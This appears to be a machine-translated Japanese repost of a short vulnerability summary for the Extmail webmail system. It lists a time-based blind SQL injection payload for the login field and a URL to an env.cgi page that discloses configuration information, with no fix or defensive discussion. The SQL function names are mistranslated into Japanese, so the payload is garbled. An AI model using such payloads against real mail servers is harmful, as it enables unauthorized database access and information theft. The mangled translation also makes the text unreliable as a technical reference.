アプリケーションセキュリティ - メールシステム - Extmail - 脆弱性の概要

レセプションSQLインジェクション

ペイロード(噴射名の遅延がある):
ADMIN ' AND IF(ASCII(ストリング(ユーザー()、1,1))> 104、ベンチマーク(2,000,000、MD5(0x72696e67)),. 1)%23のIS

 

機密情報の受信開示

ペイロード:
http:// xxx.xxx.com/extmail/cgi/env.cgi

 

おすすめ

転載: www.cnblogs.com/AtesetEnginner/p/12329522.html